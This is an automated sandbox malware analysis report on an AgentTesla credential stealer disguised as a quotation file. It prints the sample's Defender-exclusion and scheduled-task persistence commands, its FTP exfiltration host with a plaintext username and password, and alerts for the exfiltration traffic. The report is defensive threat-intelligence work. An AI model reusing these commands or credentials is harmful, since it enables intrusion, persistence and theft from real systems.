Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rQuotation3200025006.exe

Overview

General Information

Sample name:rQuotation3200025006.exe
Analysis ID:1520520
MD5:36c4bff0f1cdcda62da9229500ca1e38
SHA1:de74dbf7bac85a3a06c7038a4d4241389e6a5c8f
SHA256:fda83ecb5bd6a07dedaf6be0fce7c626e21e9df94d82ddb905460e9d6a25a162
Tags:AgentTeslaexeuser-Porcupine
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rQuotation3200025006.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • powershell.exe (PID: 824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7068 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rQuotation3200025006.exe (PID: 2756 cmdline: "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • pBBqGOzrz.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 7420 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • pBBqGOzrz.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • pBBqGOzrz.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • sgxIb.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 7932 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 7996 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 8012 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • sgxIb.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.rQuotation3200025006.exe.377e4e0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.rQuotation3200025006.exe.377e4e0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.rQuotation3200025006.exe.377e4e0.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.rQuotation3200025006.exe.377e4e0.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  22.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", ProcessId: 824, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\rQuotation3200025006.exe, ProcessId: 2756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", ProcessId: 824, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, ParentImage: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, ParentProcessId: 7260, ParentProcessName: pBBqGOzrz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", ProcessId: 7420, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", ProcessId: 7068, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", ProcessId: 824, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", ProcessId: 7068, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T13:10:17.718048+020020299271A Network Trojan was detected192.168.2.449741110.4.45.19721TCP
                    2024-09-27T13:10:24.710806+020020299271A Network Trojan was detected192.168.2.449751110.4.45.19721TCP
                    2024-09-27T13:10:31.146663+020020299271A Network Trojan was detected192.168.2.449756110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T13:10:19.571041+020028555421A Network Trojan was detected192.168.2.449746110.4.45.19753334TCP
                    2024-09-27T13:10:19.576306+020028555421A Network Trojan was detected192.168.2.449746110.4.45.19753334TCP
                    2024-09-27T13:10:25.537921+020028555421A Network Trojan was detected192.168.2.449753110.4.45.19751497TCP
                    2024-09-27T13:10:25.543689+020028555421A Network Trojan was detected192.168.2.449753110.4.45.19751497TCP
                    2024-09-27T13:10:31.976691+020028555421A Network Trojan was detected192.168.2.449757110.4.45.19755730TCP
                    2024-09-27T13:10:31.982121+020028555421A Network Trojan was detected192.168.2.449757110.4.45.19755730TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 57%
                    Multi AV Scanner detection for submitted file
                    Source: rQuotation3200025006.exeReversingLabs: Detection: 57%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: rQuotation3200025006.exeJoe Sandbox ML: detected
                    Source: rQuotation3200025006.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: rQuotation3200025006.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4D7B
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4ECD
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4EE4
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC4073
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC41C5
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC41DC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D4073
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D41C5
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D41DC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_07274073
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_072741C5
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_072741DC

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 110.4.45.197:51497
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49746 -> 110.4.45.197:53334
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49751 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49756 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49757 -> 110.4.45.197:55730
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 110.4.45.197 ports 65186,64130,59960,61524,61759,53786,55824,55768,51546,61163,57406,65361,64095,62561,62089,1,53694,52440,2,56668,53334,58620,51497,55730,55438,60182,52328,21,55958
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 110.4.45.197:53694
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036E5000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.0000000003634000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
